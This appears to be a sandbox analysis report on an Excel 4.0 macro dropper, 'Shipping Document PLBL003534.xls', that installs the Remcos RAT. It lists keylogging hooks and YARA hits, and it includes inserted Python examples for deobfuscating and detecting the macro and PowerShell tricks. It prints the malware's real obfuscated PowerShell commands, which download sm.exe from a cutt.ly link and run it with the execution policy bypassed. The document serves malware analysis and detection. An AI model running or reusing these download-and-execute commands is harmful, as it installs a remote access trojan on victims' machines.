                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Right]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Up]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Left]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [End]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [F2]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [F1]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Del]
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Esc]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Enter]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Tab]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Down]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Right]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Up]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Left]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [End]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [F2]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [F1]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Esc]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Enter]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Tab]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Down]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Right]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Up]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Left]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [End]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [F2]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [F1]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: [Del]
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_004052D5 SetWindowsHookExA 0000000D,004052BA,00000000,00000000
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 27_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 34_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,

                E-Banking Fraud:

                Yara detected Remcos RAT
                Source: Yara match | File source: 0000000C.00000002.2198088639.0000000002291000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.2199538688.0000000003299000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: sm.exe PID: 2112, type: MEMORY
                Source: Yara match | File source: Process Memory Space: remcos.exe PID: 884, type: MEMORY
                Source: Yara match | File source: Process Memory Space: remcos.exe PID: 2312, type: MEMORY
                Source: Yara match | File source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE

                System Summary:

                Malicious sample detected (through community Yara rule)
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 18.2.sm.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 27.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 18.2.sm.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 27.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 34.2.remcos.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Remcos Payload (Author: kevoreilly)
                Source: 34.2.remcos.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants (Author: unknown)
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                Source: Screenshot number: 4 | Screenshot OCR: Enable Content ' L'Ji 6 7 8 9 10 " 12 13 14 15 16 17 18 19 20 21 ~ 22 M'" 23
                Source: Document image extraction number: 0 | Screenshot OCR: Enable Content L) 'b m ~
                Source: Document image extraction number: 1 | Screenshot OCR: Enable Content LJi ~m
                Found Excel 4.0 Macro with suspicious formulas
                Source: Shipping Document PLBL003534.xls | Initial sample: EXEC
                Found abnormal large hidden Excel 4.0 Macro sheet
                Source: Shipping Document PLBL003534.xls | Initial sample: Sheet size: 5194
                Found obfuscated Excel 4.0 Macro
                Source: Shipping Document PLBL003534.xls | Initial sample: High usage of CHAR() function: 16
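The three Excel 4.0 findings above rest on simple static heuristics: an EXEC formula on the macro sheet, a large hidden macro sheet, and heavy use of CHAR() to assemble strings one character at a time so that the command never appears as a literal. The Python below is an added example, not from the report, that applies the same heuristics to a set of XLM cells and additionally folds CHAR() chains and cell references back into the string an EXEC call would run. The cells are a constructed macro written for the example; the sample's own formulas are not shown in the report, so they are not reproduced here.

```python
import re

CHAR_RE = re.compile(r"CHAR\((\d+)\)", re.IGNORECASE)
EXEC_RE = re.compile(r"^=EXEC\((.*)\)$", re.IGNORECASE)
CELL_REF_RE = re.compile(r"[A-Z]{1,3}\d+")
SUSPICIOUS_FUNCS = ("EXEC", "CALL", "REGISTER", "FORMULA.FILL", "FORMULA")

# Constructed macro sheet (NOT the sample's own macro): "cmd /c" built one CHAR() at a
# time in A1, concatenated with a literal in A2, and executed by A3.
SAMPLE_CELLS = {
    "A1": "=CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)",
    "A2": '=A1&" calc"',
    "A3": "=EXEC(A2)",
    "A4": "=HALT()",
}


def fold_chars(expr):
    """Turn every CHAR(n) into a quoted literal, then merge adjacent "a"&"b" literals."""
    expr = CHAR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', expr)
    prev = None
    while prev != expr:                       # repeat until no adjacent pair is left
        prev, expr = expr, re.sub(r'"([^"]*)"\s*&\s*"([^"]*)"', r'"\1\2"', expr)
    return expr


def resolve(expr, cells, depth=0):
    """Evaluate a string-building XLM expression: literals, CHAR(), & and cell references."""
    expr = fold_chars(expr.lstrip("="))
    parts = []
    for term in re.split(r"\s*&\s*", expr):
        term = term.strip()
        if len(term) >= 2 and term[0] == term[-1] == '"':
            parts.append(term[1:-1])
        elif CELL_REF_RE.fullmatch(term) and term in cells and depth < 32:
            parts.append(resolve(cells[term], cells, depth + 1))   # follow the reference
        else:
            parts.append(term)                # anything we cannot fold stays as written
    return "".join(parts)


def triage(cells):
    """CHAR() count, suspicious function names, and each EXEC call with its resolved argument."""
    char_calls = sum(len(CHAR_RE.findall(f)) for f in cells.values())
    funcs = sorted({
        name for name in SUSPICIOUS_FUNCS
        for f in cells.values()
        if re.search(r"\b" + re.escape(name) + r"\(", f, re.IGNORECASE)
    })
    exec_calls = [(ref, resolve(m.group(1), cells))
                  for ref, f in cells.items()
                  for m in [EXEC_RE.match(f)] if m]
    return {"char_calls": char_calls, "suspicious_funcs": funcs, "exec_calls": exec_calls}


if __name__ == "__main__":
    print(triage(SAMPLE_CELLS))
```

The CHAR() count is a proxy, not proof: legitimate sheets rarely spell out text with CHAR(), but a determined author can move the same work into FORMULA.FILL or MID() over a long constant, so the resolved EXEC argument is the finding worth acting on, the count is only what makes the sheet worth a look.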
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\sm.exe
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
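The three powershell command lines above use two cheap obfuscations aimed at string-matching detections: backtick escapes dropped into bareword tokens (nEw-oB`jecT, ${enV`:temp}) and string concatenation handed to the invocation operator or to a method lookup (.('S'+'tart'+'-Sl'+'eep'), .('Down'+'loadFile').Invoke(...)). Neither changes what PowerShell executes. The Python below is an added example, not from the report or the malware, that normalizes such lines before matching them against a small illustrative rule set; the sample input is a constructed copy of the three lines above, and the rule names are the example's own.

```python
import re

# Constructed copies of the three command lines reported above (sample input only).
SAMPLE_CMDLINES = [
    "powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')",
    "powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'",
    "powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')",
]

CONCAT_RE = re.compile(r"\(\s*'[^']*'(?:\s*\+\s*'[^']*')+\s*\)")           # ('a'+'b'+'c')
METHOD_RE = re.compile(r"\.\(\s*'([^']*)'\s*\)\.Invoke\(", re.IGNORECASE)  # .('Name').Invoke(
CALL_RE = re.compile(r"(?<![\w)\]])\.\(\s*'([^']*)'\s*\)")                  # .('Command')


def strip_backticks(cmd):
    """Remove backtick escapes outside quoted strings: nEw-oB`jecT -> nEw-oBjecT."""
    out, quote = [], None
    for ch in cmd:
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "`":
            continue                      # an escape in a bareword only escapes the next char
        out.append(ch)
    return "".join(out)


def _join(m):
    return "('" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "')"


def normalize_powershell(cmd):
    """Undo the obfuscations so a rule sees the verbs PowerShell actually runs."""
    cmd = strip_backticks(cmd)
    prev = None
    while prev != cmd:                    # collapse ('a'+'b') chains, including nested ones
        prev, cmd = cmd, CONCAT_RE.sub(_join, cmd)
    cmd = METHOD_RE.sub(r".\1(", cmd)     # .('DownloadFile').Invoke(  ->  .DownloadFile(
    cmd = CALL_RE.sub(r"\1", cmd)         # .('Start-Sleep')           ->  Start-Sleep
    return cmd


# Illustrative rules, matched against the lower-cased normalized command line.
RULES = {
    "hidden-window":           re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b"),  # -w 1 is -WindowStyle Hidden
    "execution-policy-bypass": re.compile(r"-e[a-z]*\s+bypass"),                   # -EP / -Exec / -ExecutionPolicy
    "download":                re.compile(r"downloadfile|downloadstring|invoke-webrequest"),
    "sleep-delay":             re.compile(r"start-sleep"),
    "temp-dir":                re.compile(r"\$\{?env:temp\}?"),
}


def classify(cmd):
    """Return (normalized command line, sorted list of matched rule names)."""
    norm = normalize_powershell(cmd)
    low = norm.lower()
    tags = {name for name, rx in RULES.items() if rx.search(low)}
    if norm != cmd:                       # normalization changed something: it was obfuscated
        tags.add("obfuscation")
    return norm, sorted(tags)


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        norm, tags = classify(line)
        print(tags, norm)
```

Two details of the normalized output matter for triage: -w 1 is the numeric form of -WindowStyle Hidden, and the third line's -EP bypass plus cd into ${env:temp} followed by ./sm.exe is the actual execution step, so a rule that only looked for the literal strings DownloadFile or Start-Sleep in the raw command line would have missed all three.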
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Memory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\sm.exe | Code function: 18_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe | Code function: 27_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
